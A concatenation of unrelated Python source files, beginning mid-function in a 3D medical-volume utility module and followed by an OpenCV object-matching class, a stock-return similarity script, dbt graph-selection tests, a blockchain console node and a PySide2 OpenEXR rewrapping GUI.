                high = extent - half
        if high <= low:
            # Degenerate range: fall back to the midpoint.
            center.append(int((low + high) / 2))
        else:
            center.append(random.randint(low, high))
    return center
def transpose_volumes(volumes, slice_direction):
    """
    Transpose a list of volumes so the requested direction becomes axis 0.
    inputs:
        volumes: a list of nd volumes
        slice_direction: 'axial', 'sagittal', or 'coronal'
    outputs:
        tr_volumes: a list of transposed volumes ('axial' returns the input list)
    """
    axis_orders = {'sagittal': (2, 0, 1), 'coronal': (1, 0, 2)}
    if slice_direction == 'axial':
        # Axial is the storage order already; nothing to do.
        return volumes
    if slice_direction in axis_orders:
        order = axis_orders[slice_direction]
        return [np.transpose(vol, order) for vol in volumes]
    print('undefined slice direction:', slice_direction)
    return volumes
def resize_ND_volume_to_given_shape(volume, out_shape, order = 3):
    """
    Resize an nd volume to a given shape.
    inputs:
        volume: the input nd volume, an nd array
        out_shape: the desired output shape, a list (same rank as volume)
        order: the spline interpolation order (0-5, default 3)
    outputs:
        out_volume: the resized nd volume with the given shape
    """
    shape0 = volume.shape
    assert(len(shape0) == len(out_shape))
    # Per-axis zoom factors; +0.0 forces float division (Python 2 heritage).
    scale = [(out_shape[i] + 0.0) / shape0[i] for i in range(len(shape0))]
    # ndimage.interpolation.zoom is a deprecated alias that recent SciPy
    # releases removed; call ndimage.zoom directly.
    out_volume = ndimage.zoom(volume, scale, order=order)
    return out_volume
def extract_roi_from_volume(volume, in_center, output_shape, fill = 'random'):
    """
    Extract a roi from a 3d volume.
    inputs:
        volume: the input 3D volume
        in_center: the center of the roi
        output_shape: the size of the roi
        fill: 'random' or 'zero', the mode to fill roi region where is outside of the input volume
    outputs:
        output: the roi volume
    """
    in_shape = volume.shape
    # Pre-fill the roi so voxels outside the input volume get padding values.
    if fill == 'random':
        output = np.random.normal(0, 1, size=output_shape)
    else:
        output = np.zeros(output_shape)
    # Half-extents of the roi below (lo) and above (hi) its center, clipped
    # against the input volume boundary.
    half = [int(s / 2) for s in output_shape]
    upper = [output_shape[d] - half[d] for d in range(len(half))]
    lo = [min(half[d], in_center[d]) for d in range(len(half))]
    hi = [min(upper[d], in_shape[d] - in_center[d]) for d in range(len(half))]
    out_center = half
    dst = tuple(slice(out_center[d] - lo[d], out_center[d] + hi[d]) for d in range(3))
    src = tuple(slice(in_center[d] - lo[d], in_center[d] + hi[d]) for d in range(3))
    output[dst] = volume[src]
    return output
def set_roi_to_volume(volume, center, sub_volume):
    """
    Set the content of an roi of a 3d/4d volume to a sub volume.
    inputs:
        volume: the input 3D/4D volume; modified in place
        center: the center of the roi
        sub_volume: the content of sub volume
    outputs:
        output_volume: the output 3D/4D volume (same object as `volume`)
    raises:
        ValueError: if len(center) is not 3 or 4
    """
    vol_shape = volume.shape
    patch_shape = sub_volume.shape
    output_volume = volume
    # A center outside the volume means nothing to write.
    for d, c in enumerate(center):
        if c >= vol_shape[d]:
            return output_volume
    # Half-extents of the patch below (lo) and above (hi) its center, clipped
    # against the volume boundary.
    half = [int(s / 2) for s in patch_shape]
    upper = [patch_shape[d] - half[d] for d in range(len(half))]
    lo = [min(half[d], center[d]) for d in range(len(half))]
    hi = [min(upper[d], vol_shape[d] - center[d]) for d in range(len(half))]
    patch_center = half
    ndim = len(center)
    if ndim not in (3, 4):
        raise ValueError("array dimension should be 3 or 4")
    dst = tuple(slice(center[d] - lo[d], center[d] + hi[d]) for d in range(ndim))
    src = tuple(slice(patch_center[d] - lo[d], patch_center[d] + hi[d]) for d in range(ndim))
    output_volume[dst] = sub_volume[src]
    return output_volume
def get_largest_two_component(img, print_info = False, threshold = None):
    """
    Get the largest two components of a binary volume.
    inputs:
        img: the input 3D volume
        print_info: whether to print the sorted component sizes
        threshold: a size threshold; when given, keep every component
                   larger than it instead of the top two
    outputs:
        out_img: the output volume
    """
    struct = ndimage.generate_binary_structure(3, 2)  # 26-connectivity
    labeled_array, num_patches = ndimage.label(img, struct)
    sizes = ndimage.sum(img, labeled_array, range(1, num_patches + 1))
    sorted_sizes = sorted(sizes[i] for i in range(len(sizes)))
    if print_info:
        print('component size', sorted_sizes)
    if len(sizes) == 1:
        # Only one component: nothing to filter out.
        return img
    if threshold:
        out_img = np.zeros_like(img)
        for size in sorted_sizes:
            if size > threshold:
                lab = np.where(sizes == size)[0] + 1
                out_img = (out_img + (labeled_array == lab)) > 0
        return out_img
    big1 = sorted_sizes[-1]
    big2 = sorted_sizes[-2]
    comp1 = labeled_array == (np.where(sizes == big1)[0] + 1)
    comp2 = labeled_array == (np.where(sizes == big2)[0] + 1)
    # Keep the runner-up too when it is at least a tenth of the largest.
    if big2 * 10 > big1:
        comp1 = (comp1 + comp2) > 0
    return comp1
def fill_holes(img):
    """
    Fill small holes of a binary volume with morphological operations.

    Labels the complement of the foreground and keeps only its largest
    connected component (the outside background); every enclosed cavity is
    thereby absorbed into the returned foreground.
    """
    complement = 1 - img
    struct = ndimage.generate_binary_structure(3, 1)  # 6-connectivity
    labeled_array, num_patches = ndimage.label(complement, struct)
    sizes = ndimage.sum(complement, labeled_array, range(1, num_patches + 1))
    largest = max(sizes[i] for i in range(len(sizes)))
    background_label = np.where(sizes == largest)[0] + 1
    background = labeled_array == background_label
    return 1 - background
def remove_external_core(lab_main, lab_ext):
    """
    Remove the core region that is outside of whole tumor.

    Each connected component of lab_ext is kept only when at least half of
    its voxels overlap with lab_main.
    """
    struct = ndimage.generate_binary_structure(3, 2)  # 26-connectivity
    labeled_array, num_patches = ndimage.label(lab_ext, struct)
    sizes = ndimage.sum(lab_ext, labeled_array, range(1, num_patches + 1))
    new_lab_ext = np.zeros_like(lab_ext)
    for comp_size in [sizes[i] for i in range(len(sizes))]:
        lab = np.where(sizes == comp_size)[0] + 1
        component = labeled_array == lab
        overlap = component * lab_main
        # +0.0 forces float division (Python 2 heritage).
        if (overlap.sum() + 0.0) / comp_size >= 0.5:
            new_lab_ext = np.maximum(new_lab_ext, component)
    return new_lab_ext
def binary_dice3d(s, g):
    """
    Dice score of 3d binary volumes.
    inputs:
        s: segmentation volume
        g: ground truth volume
    outputs:
        dice: the dice score
    """
    assert(len(s.shape) == 3)
    d1, h1, w1 = s.shape
    d2, h2, w2 = g.shape
    assert(d1 == d2 and h1 == h2 and w1 == w2)
    intersection = np.multiply(s, g).sum()
    # The 1e-10 terms keep the score defined when both volumes are empty.
    return (2.0 * intersection + 1e-10) / (s.sum() + g.sum() + 1e-10)
|
<reponame>dfalveargOT/CropApp
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 5 15:45:11 2019
Copyright © 2019 DataRock S.A.S. All rights reserved.
@author: DavidFelipe
Second Module
Matching each object with the corresponding coordinates
"""
# Import third-party dependencies; print a readable hint instead of an
# unexplained traceback when one of them is missing.
try:
    import numpy as np
    import cv2
    import time
    import progressbar
except ImportError:
    # Only catch import failures: the previous bare `except:` also swallowed
    # unrelated errors such as KeyboardInterrupt and SystemExit.
    print(" PLEASE REVIEW THE MODULES THAT NEEDS THE SOFTWARE - AN ERROR WAS OCCURRED")

print(" %% SECOND MODULE %%")
print(" -- Matching object module for images -- Check the current progress --")
class MatchCore:
    """
    Procedure to find the objects and extract window information
    of the current object in process.

    Operates on an RGB image plus result layers from the previous pipeline
    stage: contours found in each layer are marked on copies of the image
    and summarised as bounding-box vectors and blob-marker images.
    """
    def __init__(self, imageRGB, Rlayer1, Rlayer2, Rlayer3, Vmean, Vrange):
        # imageRGB: source image (numpy array in OpenCV layout).
        # Rlayer1..3: per-channel result layers from the previous stage.
        # Vmean / Vrange: colour statistics from upstream.
        #   NOTE(review): vector_mean/vector_range are stored but never read
        #   within this class — presumably consumed elsewhere; confirm.
        print(" ")
        print("MatchCore process")
        self.image = imageRGB
        self.layer1 = Rlayer1
        self.layer2 = Rlayer2
        self.layer3 = Rlayer3
        self.vector_mean = Vmean
        self.vector_range = Vrange
    def CoreFinding(self, layer):
        """Dispatch ObjectMatch over `layer`.

        A 3-channel layer is processed channel by channel (returns the three
        marked images, stacked masks, per-channel vectors and blob images);
        a 2-D layer is processed once. Any other rank only prints an error.
        """
        shapeLayer = np.array(layer.shape)
        val = shapeLayer.shape
        print(" ")
        print(" matchCore proceesing corefinding ")
        if(val[0] == 3):
            # print("RGB format found")
            ## Process each of the three channels separately, with a small
            ## progress bar covering the assembly steps below.
            widgets = [progressbar.Percentage(),
                ' ', progressbar.Bar(),
                ' ', progressbar.ETA(),
                ' ', progressbar.AdaptiveETA()]
            bar = progressbar.ProgressBar(widgets=widgets, maxval=5)
            bar.start()
            Mlayer1, mask_layer1, vector_layer1, count_layer1, blob_layer1 = self.ObjectMatch(self.image, layer[:,:,0])
            Mlayer2, mask_layer2, vector_layer2, count_layer2, blob_layer2 = self.ObjectMatch(self.image, layer[:,:,1])
            Mlayer3, mask_layer3, vector_layer3, count_layer3, blob_layer3 = self.ObjectMatch(self.image, layer[:,:,2])
            bar.update(1)
            # Stack the per-channel masks / blob images back into 3-channel arrays.
            mask_layer = np.zeros_like(layer)
            blob_layer = np.zeros_like(layer)
            bar.update(2)
            blob_layer[:,:,0] = blob_layer1
            blob_layer[:,:,1] = blob_layer2
            blob_layer[:,:,2] = blob_layer3
            bar.update(3)
            mask_layer[:,:,0] = mask_layer1
            mask_layer[:,:,1] = mask_layer2
            mask_layer[:,:,2] = mask_layer3
            bar.update(4)
            # NOTE(review): count_layer is assembled but not returned —
            # confirm whether callers need the per-channel object counts.
            count_layer = np.array([count_layer1, count_layer2, count_layer3])
            vector_layer = [vector_layer1, vector_layer2, vector_layer3]
            bar.update(5)
            return Mlayer1, Mlayer2, Mlayer3, mask_layer, vector_layer, blob_layer
        elif(val[0] == 2):
            # print("Fourier result processing")
            # Single 2-D layer: one ObjectMatch pass (count is dropped here).
            match_layer, mask_layer, vector_layer, count_layer, blob_layer = self.ObjectMatch(self.image, layer)
            return match_layer, mask_layer, vector_layer, blob_layer
        else:
            print(" PROBLEM WITH THE DATA, THE SIZE OF THE ENTRY IS NOT CORRECT, VERIFY THE LAST CONVERTIONS")
    # cv2.CHAIN_APPROX_TC89_L1  (alternative contour approximation mode)
    def ObjectMatch(self, image, mask):
        """Find external contours in `mask`, mark their centers on a copy of
        the image, and collect bounding boxes of plausibly-sized objects.

        Returns (marked image, center mask, Nx4 bounding-box array, object
        count, blob-marker image).
        NOTE(review): vector_object starts as a [0,0,0,0] row that remains
        as the first row of the returned array — confirm callers expect it.
        """
        x, y, _ = image.shape
        image_mark = np.copy(self.image)
        object_mask = np.zeros([x,y])
        contours,hierachy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        counter = 0
        vector_object = np.array([0,0,0,0])
        for (i, contour) in enumerate(contours):
            (x, y, w, h) = cv2.boundingRect(contour)
            # Reject contours that are implausibly small or large (pixels).
            contour_valid = (w >= 7) and (
                h >= 7) and (w <= 500) and (h <= 500)
            if not contour_valid:
                continue
            counter += 1
            ## Bounding box for the tracker
            boundingBox = np.array([x,y,w,h])
            ## A tracker type would be selected here
            # getting center of the bounding box
            x1 = int(w / 2)
            y1 = int(h / 2)
            cx = x + x1
            cy = y + y1
            cv2.circle(image_mark, (cx, cy), 10, (255, 255, 255), 2)
            cv2.circle(image_mark, (cx, cy), 4, (0, 0, 255), -1)
            cv2.circle(object_mask, (cx, cy), 10, (255, 255, 255), 4)
            ## Vector of the current object
            vector_object = np.vstack((vector_object, boundingBox))
        ###3 Detection using Blob
        detector = cv2.SimpleBlobDetector_create()
        keypoints = detector.detect(self.image)
        image_blob = mask.copy()
        # print(keypoints.type)
        for kp in keypoints:
            image_blob = cv2.drawMarker(image_blob, tuple(int(i) for i in kp.pt), color=(0,0,255))
        return image_mark, object_mask, vector_object, counter, image_blob
|
<reponame>AccelexTechnology/Company2Vec
import pickle

import numpy as np
import pandas as pd
# Monthly stock-return DataFrames keyed by ticker, produced upstream.
revised_month_stock_df_dict = pickle.load(open("../dataset/revised_month_stock_df_dict.pkl","rb"))

# Accumulators for the tickers that survive the filters below.
use_ticker_list_sec = []
use_stock_price_list = []
sector_array = []
industry_array = []
use_text_data = []
stock_size = 58  # number of most recent monthly returns kept per ticker
use_ticker_list_limit = []
use_stock_price_list_limit = []
use_sec_code_list = []

# NOTE(review): use_ticker_list, sec_code2sector, sec_code2industry and
# text_data are not defined in this file — presumably created by an earlier
# script/notebook cell this code was extracted from; confirm before running.
for index, ticker in enumerate(use_ticker_list):
    # The first four digits of the ticker form the securities code.
    sec_code = int(str(ticker)[:4])
    use_sec_code_list.append(sec_code)
    if sec_code in sec_code2sector:
        # Require at least 12 months of return history within the window.
        if len(revised_month_stock_df_dict[ticker]["return"][-stock_size:]) >= 12:
            if (type(sec_code2sector[sec_code ]) == str) :
                use_stock_price_list.append(list(revised_month_stock_df_dict[ticker]["return"])[-stock_size:])
                sector_array.append(sec_code2sector[sec_code])
                use_text_data.append(text_data[sec_code])
                industry_array.append(sec_code2industry[sec_code])
                use_ticker_list_sec.append(sec_code)
                # Tickers with exactly stock_size months form the "limit" set
                # used for the common-length similarity matrix.
                if len(revised_month_stock_df_dict[ticker]["return"]) == stock_size:
                    use_ticker_list_limit.append(sec_code)
                    use_stock_price_list_limit.append(list(revised_month_stock_df_dict[ticker]["return"]))
            #else:
                #print (sec_code)

# Precomputed cosine-similarity matrix of the common-length tickers; the
# commented lines below show how it was originally generated and saved.
stock_similarity_mat_limit = pd.read_csv("stock_data/common_length_mat.csv", index_col=0)
#use_ticker_list_limit_pair_cossim = sklearn.metrics.pairwise.cosine_similarity(np.array(use_stock_price_list_limit))
#stock_similarity_mat_limit = pd.DataFrame(dict(zip(use_ticker_list_limit, use_ticker_list_limit_pair_cossim)))
#stock_similarity_mat_limit.index = use_ticker_list_limit
#stock_similarity_mat_limit.to_csv("stock_data/common_length_mat.csv")
def calc_stockprice_cosine_similarity(code_1, code_2):
    """Cosine similarity between the monthly-return series of two tickers.

    Only months present in both series are compared; returns 0 when fewer
    than 12 months overlap. Reads the module-level
    revised_month_stock_df_dict.
    """
    stock_df_1 = revised_month_stock_df_dict[code_1]
    stock_df_2 = revised_month_stock_df_dict[code_2]
    common_months = set(stock_df_1["month"]) & set(stock_df_2["month"])
    if len(common_months) < 12:
        return 0
    returns_1 = stock_df_1[[month in common_months for month in stock_df_1["month"]]]["return"]
    returns_2 = stock_df_2[[month in common_months for month in stock_df_2["month"]]]["return"]
    unit_1 = np.array(returns_1) / np.linalg.norm(returns_1)
    unit_2 = np.array(returns_2) / np.linalg.norm(returns_2)
    # Dot product of unit vectors == cosine similarity.
    return unit_1.dot(unit_2)
# Tickers with sector info but without full common-length history; their
# pairwise similarities were precomputed and stored one CSV per ticker.
remain_tick_list = np.sort(list(set(use_sec_code_list) - set(use_ticker_list_limit)))
additional_similarity_mat = []
for index_1, ticker_1 in enumerate(remain_tick_list):
    df = pd.read_csv("stock_data/stock_similarity_mat/" + str(ticker_1) + ".csv", index_col=1)
    # Drop the leftover first column from the CSV, keeping the similarities.
    df = df.T[1:].T
    df.columns = [ ticker_1]
    additional_similarity_mat.append(df)
additional_similarity_mat_df = pd.concat(additional_similarity_mat, axis = 1).T
# Normalise column labels to 4-digit securities codes (int).
additional_similarity_mat_df.columns = [int(str(val)[:4]) for val in additional_similarity_mat_df.columns]

# Merge the common-length matrix with the additional tickers into a single
# all-pairs similarity matrix, sorted by securities code on both axes.
common_similarity_mat_df = pd.read_csv("stock_data/common_length_mat.csv", index_col=0)
common_similarity_mat_df.columns = np.array(common_similarity_mat_df.columns).astype(int)
similarity_mat_df = pd.concat([
    pd.concat([
        pd.concat([common_similarity_mat_df[index], additional_similarity_mat_df[index]]).sort_index()
    for index in common_similarity_mat_df.index], axis =1),
    additional_similarity_mat_df.T], axis = 1).T.sort_index()
similarity_mat_df.to_csv("stock_data/all_similarity_mat.csv")
import pytest
from dbt.tests.util import run_dbt
from tests.functional.graph_selection.fixtures import SelectionFixtures
def run_schema_and_assert(project, include, exclude, expected_tests):
    """Build the project, then run `dbt test` with the given selectors and
    assert that exactly the expected schema tests executed."""
    # deps must run before seed
    run_dbt(["deps"])
    run_dbt(["seed"])
    run_results = run_dbt(["run", "--exclude", "never_selected"])
    assert len(run_results) == 10

    test_args = ["test"]
    if include:
        test_args.extend(["--select", include])
    if exclude:
        test_args.extend(["--exclude", exclude])
    executed = sorted(result.node.name for result in run_dbt(test_args))
    assert executed == sorted(expected_tests)
class TestSchemaTestGraphSelection(SelectionFixtures):
    """Each case runs `dbt test` with a node selector and checks exactly
    which schema tests were executed (see run_schema_and_assert)."""

    @pytest.fixture(scope="class")
    def packages(self):
        # Pull in the integration project so package-scoped selection
        # (dbt_integration_project.*) has something to select.
        return {
            "packages": [
                {
                    "git": "https://github.com/dbt-labs/dbt-integration-project",
                    "revision": "dbt/1.0.0",
                }
            ]
        }

    def test_schema_tests_no_specifiers(self, project):
        expected = [
            "not_null_emails_email",
            "unique_table_model_id",
            "unique_users_id",
            "unique_users_rollup_gender",
        ]
        run_schema_and_assert(project, None, None, expected)

    def test_schema_tests_specify_model(self, project):
        run_schema_and_assert(project, "users", None, ["unique_users_id"])

    def test_schema_tests_specify_tag(self, project):
        expected = ["unique_users_id", "unique_users_rollup_gender"]
        run_schema_and_assert(project, "tag:bi", None, expected)

    def test_schema_tests_specify_model_and_children(self, project):
        expected = ["unique_users_id", "unique_users_rollup_gender"]
        run_schema_and_assert(project, "users+", None, expected)

    def test_schema_tests_specify_tag_and_children(self, project):
        expected = ["not_null_emails_email", "unique_users_id", "unique_users_rollup_gender"]
        run_schema_and_assert(project, "tag:base+", None, expected)

    def test_schema_tests_specify_model_and_parents(self, project):
        expected = ["unique_users_id", "unique_users_rollup_gender"]
        run_schema_and_assert(project, "+users_rollup", None, expected)

    def test_schema_tests_specify_model_and_parents_with_exclude(self, project):
        run_schema_and_assert(project, "+users_rollup", "users_rollup", ["unique_users_id"])

    def test_schema_tests_specify_exclude_only(self, project):
        expected = ["not_null_emails_email", "unique_table_model_id", "unique_users_id"]
        run_schema_and_assert(project, None, "users_rollup", expected)

    def test_schema_tests_specify_model_in_pkg(self, project):
        # TODO: change this. there's no way to select only direct ancestors atm.
        run_schema_and_assert(project, "test.users_rollup", None, ["unique_users_rollup_gender"])

    def test_schema_tests_with_glob(self, project):
        expected = [
            "not_null_emails_email",
            "unique_table_model_id",
            "unique_users_rollup_gender",
        ]
        run_schema_and_assert(project, "*", "users", expected)

    def test_schema_tests_dep_package_only(self, project):
        run_schema_and_assert(project, "dbt_integration_project", None, ["unique_table_model_id"])

    def test_schema_tests_model_in_dep_pkg(self, project):
        run_schema_and_assert(project, "dbt_integration_project.table_model", None, ["unique_table_model_id"])

    def test_schema_tests_exclude_pkg(self, project):
        expected = ["not_null_emails_email", "unique_users_id", "unique_users_rollup_gender"]
        run_schema_and_assert(project, None, "dbt_integration_project", expected)
|
<reponame>TranXuanHoang/Python
import json
from blockchain import Blockchain
from utility.verification import Verification
from wallet import Wallet
class NodeConsole:
    """ Initialize starting point of the app and provide console and/or terminal based
    commands for interacting with users.
    Attributes:
        wallet (:obj:`Wallet`): A wallet that has a pair of public and private keys.
            The public key is used as a unique user ID of the sender of every transactions
            made by this node user.
        blockchain (:obj:`Blockchain`): An instance of the `Blockchain` class containing
            all state of the blockchain and transactions as well as its processing logic methods.
    """

    def __init__(self, port):
        # The port is also forwarded to Wallet and Blockchain (presumably to
        # namespace this node's on-disk state — confirm in those classes).
        self.port = port
        self.wallet = Wallet(port)
        self.wallet.create_keys()
        self.blockchain = Blockchain(self.wallet.public_key, port)

    def get_transaction_value(self):
        """ Return user input as a tuple. """
        tx_recipient = input('Enter the recipient of the transaction: ')
        tx_amount = float(input('Your transaction amount please: '))
        return tx_recipient, tx_amount

    def get_user_choice(self):
        """ Return user choice as a string. """
        return input('Your choice: ')

    def print_blockchain_elements(self):
        """ Print out all blocks in the blockchain. """
        print('=' * 50)
        for index, block in enumerate(self.blockchain.chain):
            print(f'{index:>3}>>> {block}')
        else:
            # for/else runs after the loop finishes normally; with no break
            # in the loop this branch always executes, printing the raw chain
            # and a JSON rendering after the enumerated view above.
            print('_' * 50)
            print(self.blockchain.chain)
            print('_' * 50)
            print('In JSON Format:')
            jsonizeable_chain = [block.to_deep_dict()
                                 for block in self.blockchain.chain]
            print(json.dumps(jsonizeable_chain).encode('utf-8'))
        print('=' * 50)

    def listen_for_input(self):
        """Run the interactive menu loop until the user quits ('q') or the
        chain fails verification."""
        while True:
            print('Please choose an option')
            print('1: Add a new transaction value')
            print('2: Mine a new block')
            print('3: Output the blockchain blocks')
            print('4: Verify all transactions')
            print('5: Create wallet')
            print('6: Load wallet')
            print('7: Save keys')
            print('q: Quit')
            user_choice = self.get_user_choice()
            if user_choice == '1':
                tx_data = self.get_transaction_value()
                recipient, amount = tx_data
                # Sign with this node's own key; the sender is always us.
                signature = self.wallet.sign_transaction(
                    self.wallet.public_key, recipient, amount)
                if self.blockchain.add_transaction(self.wallet.public_key, recipient, signature, amount=amount):
                    print('Added transaction!')
                else:
                    print('Transaction failed!')
                print('_' * 50)
                print('Current open transactions:')
                print(self.blockchain.get_open_transactions())
                print('_' * 50)
            elif user_choice == '2':
                if self.blockchain.mine_block() == None:
                    print('Mining failed. Got no wallet?')
            elif user_choice == '3':
                self.print_blockchain_elements()
            elif user_choice == '4':
                if Verification.verify_transactions(self.blockchain.get_open_transactions(), self.blockchain.get_balance):
                    print('All transactions are valid')
                else:
                    print('There are invalid transactions')
            elif user_choice == '5':
                # New keys invalidate the old chain state, so rebuild it.
                self.wallet.create_keys()
                self.blockchain = Blockchain(self.wallet.public_key, self.port)
            elif user_choice == '6':
                self.wallet.load_keys()
                self.blockchain = Blockchain(self.wallet.public_key, self.port)
            elif user_choice == '7':
                self.wallet.save_key()
            elif user_choice == 'q':
                break
            else:
                print('Invalid option!')
            # Bail out if the chain no longer verifies after the action.
            if not Verification.verify_chain(self.blockchain.chain):
                self.print_blockchain_elements()
                print('Invalid blockchain!')
                break
            print(
                f'Balance of {self.wallet.public_key}: {self.blockchain.get_balance():6.2f}')
        else:
            # NOTE(review): unreachable — `while True` only exits via break,
            # which skips the else clause, so 'User left!' is never printed.
            print('User left!')
        print('Done!')
if __name__ == '__main__':
    from argparse import ArgumentParser

    # Command line: python node.py [-p portNum | --port portNum]
    parser = ArgumentParser(
        prog="Blockchain NodeConsole",
        usage="python node.py [-p portNum | --port portNum]",
    )
    # The port is forwarded to NodeConsole (and from there to Wallet/Blockchain).
    parser.add_argument('-p', '--port', type=int, default=5000)
    args = parser.parse_args()
    port = args.port
    node = NodeConsole(port)
    node.listen_for_input()
|
<filename>src/mainwindow.py
import os
import shutil
from PySide2 import QtCore, QtWidgets, QtUiTools
class DropWidget(QtWidgets.QWidget):
    """Widget that accepts file drag-and-drop and forwards the dropped path
    to its child QLineEdit, emitting editingFinished as if typed."""

    def __init__(self, *args, **kwargs):
        super(DropWidget, self).__init__(*args, **kwargs)
        self.setAcceptDrops(True)

    def dragEnterEvent(self, e):
        # Only accept drags that carry URLs (i.e. files), so the drop
        # cursor gives correct feedback.
        if e.mimeData().hasUrls():
            e.acceptProposedAction()
        else:
            e.ignore()

    def dropEvent(self, e):
        # NOTE(review): when several files are dropped, each iteration
        # overwrites the previous — only the last URL ends up in the field.
        for url in e.mimeData().urls():
            path = url.toLocalFile()
            line_edit = self.findChild(QtWidgets.QLineEdit)
            line_edit.setText(path)
            line_edit.editingFinished.emit()
class WrapperThread(QtCore.QThread):
    """Background thread that rewraps a sequence of OpenEXR files.

    Signals:
        progress (float): percentage of files processed so far.
        message (str): human-readable status/log lines for the UI.
    """

    progress = QtCore.Signal(float)
    message = QtCore.Signal(str)

    def __init__(self, parent):
        super(WrapperThread, self).__init__(parent)

    def set_properties(self, properties):
        """Store the option dict (input/output paths, framerange, flags)."""
        self.properties = properties

    def cancel(self):
        """Request cancellation; checked once per file in run()."""
        self.canceled = True

    def run(self):
        from wrapper import find_files, bu_dir, dst_path, rewrap
        import traceback

        self.canceled = False
        kwargs = self.properties
        files = find_files(kwargs['input'], kwargs['framerange'])
        # BUGFIX: initialize both so the cleanup below never hits a NameError
        # when an output directory is set (in-place backup dir not created).
        prev_backup = False
        backup_dir = None
        if not kwargs.get('output'):
            backup_dir, prev_backup = bu_dir(kwargs['input'])
        i = 0
        for image_file in files:
            if self.canceled:
                break
            if not os.path.isfile(image_file):
                self.message.emit('{path} not found'.format(path=image_file))
                continue
            if kwargs['output']:
                # Converting into a separate output directory.
                src = image_file
                dst = dst_path(image_file, kwargs['output'], kwargs['overwrite'])
                if not dst:
                    continue
            else:
                # In-place conversion: the original is moved to the backup
                # dir and the converted file written back to its place.
                src = os.path.join(backup_dir, os.path.basename(image_file))
                dst = image_file
                # BUGFIX: this check belongs only to the in-place branch,
                # where src is the backup path. Previously it also ran in
                # output mode, where src is the (existing) input file, so the
                # whole process aborted immediately.
                if os.path.isfile(src):
                    prev_backup = True
                    # BUGFIX: the format string had no placeholder, so the
                    # file name passed via filename= was silently dropped.
                    self.message.emit(
                        'Backup file {filename} from previous conversion in place. '
                        'Process canceled.'.format(filename=os.path.basename(src)))
                    return
            self.message.emit(os.path.basename(dst))
            if not kwargs['output']:
                shutil.move(dst, src)
            try:
                ok = rewrap(src, dst, **kwargs)
            except Exception:
                traceback.print_exc()
                ok = False
            if not ok and not kwargs.get('output'):
                # BUGFIX: "(unknown)" replaced by the actual file name —
                # filename= was passed but the string had no placeholder.
                self.message.emit(
                    'Operation failed for {filename}, restoring backup file.'.format(
                        filename=os.path.basename(dst)))
                shutil.move(src, dst)
            elif kwargs.get('no_backup'):
                # NOTE(review): in output mode src is the input file, so
                # no_backup deletes the source after conversion — confirm
                # this "move" semantic is intended.
                os.remove(src)
            i += 1
            self.progress.emit(i * 100.0 / len(files))
        # Remove the (now empty) backup dir, but never one that predates us.
        if kwargs.get('no_backup') and backup_dir and not prev_backup:
            try:
                os.removedirs(backup_dir)
            except OSError:
                pass
        self.message.emit('Canceled' if self.canceled else 'Finished')
class Manager(QtCore.QObject):
    """Loads the Designer-built main window, wires its widgets to handlers
    and drives the WrapperThread that performs the actual rewrapping."""

    def __init__(self, parent_widget=None, parent=None):
        super(Manager, self).__init__(parent)
        # DropWidget must be registered so the loader can instantiate it
        # from the .ui XML.
        loader = QtUiTools.QUiLoader()
        loader.registerCustomWidget(DropWidget)
        file = QtCore.QFile("../ui/mainwindow.ui")
        file.open(QtCore.QFile.ReadOnly)
        self.window = loader.load(file, parent_widget)
        file.close()
        # NOTE(review): an event filter is installed but no eventFilter()
        # override is visible in this class — confirm it is defined elsewhere
        # or intended as a no-op.
        self.window.installEventFilter(self)
        self.window.show()
        self.setParent(self.window)
        # Wire UI signals to handlers.
        self.window.lineEdit_input1.editingFinished.connect(self.detect_sequence)
        self.window.lineEdit_output.editingFinished.connect(self.detect_sequence)
        self.window.pushButton_rewrap.clicked.connect(self.run)
        self.window.pushButton_cancel.clicked.connect(self.cancel)
        self.window.pushButton_browse_input1.clicked.connect(self.file_dialog)
        self.window.pushButton_browse_output.clicked.connect(self.file_dialog)
        self.window.setAcceptDrops(True)
        # Worker thread reporting back via message/progress signals.
        self.thread = WrapperThread(self.window)
        self.thread.message.connect(self.message)
        self.thread.progress.connect(self.progress)

    def cancel(self):
        """Cancel a running conversion, or close the window when idle."""
        if self.thread.isRunning():
            self.thread.cancel()
        else:
            self.window.close()

    def progress(self, progress):
        """Forward worker progress (percent) to the progress bar."""
        self.window.progressBar.setValue(progress)

    def message(self, message):
        """Append a worker log line to the log pane."""
        self.window.plainTextEdit_log.appendPlainText(message)

    def detect_sequence(self, line_edit=None):
        """Normalise the path in a line edit to a sequence pattern and update
        the frame-range spinboxes / dependent checkboxes accordingly."""
        from wrapper import find_sequence
        if not line_edit:
            line_edit = self.sender()
        path = line_edit.text()
        # Only EXR files (or a sequence of them) are valid input.
        if path.split('.')[-1] in ['exr', 'EXR'] and not os.path.isdir(path):
            path, first, last = find_sequence(path)
            line_edit.setText(path)
            if 'input' in line_edit.objectName():
                self.window.pushButton_rewrap.setEnabled(bool(path))
                if first and last:
                    self.window.findChild(QtWidgets.QSpinBox, 'spinBox_first').setValue(first)
                    self.window.findChild(QtWidgets.QSpinBox, 'spinBox_last').setValue(last)
                else:
                    self.window.findChild(QtWidgets.QSpinBox, 'spinBox_first').setValue(0)
                    self.window.findChild(QtWidgets.QSpinBox, 'spinBox_last').setValue(0)
                self.window.progressBar.setValue(0)
            elif 'output' in line_edit.objectName():
                # Backups only make sense for in-place conversion; overwrite
                # only when writing to a separate output directory.
                self.window.checkBox_keep_backup.setEnabled(not bool(path))
                self.window.checkBox_overwrite.setEnabled(bool(path))
        else:
            line_edit.clear()
            self.window.plainTextEdit_log.appendPlainText('Input must be an OpenEXR file or sequence.')

    def file_dialog(self):
        """Open a file picker for the line edit next to the clicked button."""
        line_edit = self.sender().parent().findChild(QtWidgets.QLineEdit)
        file_name, _ = QtWidgets.QFileDialog.getOpenFileName(
            self.window,
            "Choose sequence ...",
            os.path.dirname(line_edit.text()),
            "OpenEXR Files (*.exr)",
        )
        if file_name:
            line_edit.setText(file_name)
            line_edit.editingFinished.emit()

    def run(self):
        """Collect all options from the UI and start the worker thread."""
        self.window.plainTextEdit_log.clear()
        self.window.pushButton_rewrap.setEnabled(False)
        properties = {}
        properties['input'] = self.window.lineEdit_input1.text()
        properties['output'] = self.window.lineEdit_output.text()
        properties['multipart'] = self.window.checkBox_multipart.isChecked()
        properties['autocrop'] = self.window.checkBox_autocrop.isChecked()
        properties['fix_channels'] = self.window.checkBox_fix_channels.isChecked()
        properties['ex_manifest'] = self.window.checkBox_ex_manifest.isChecked()
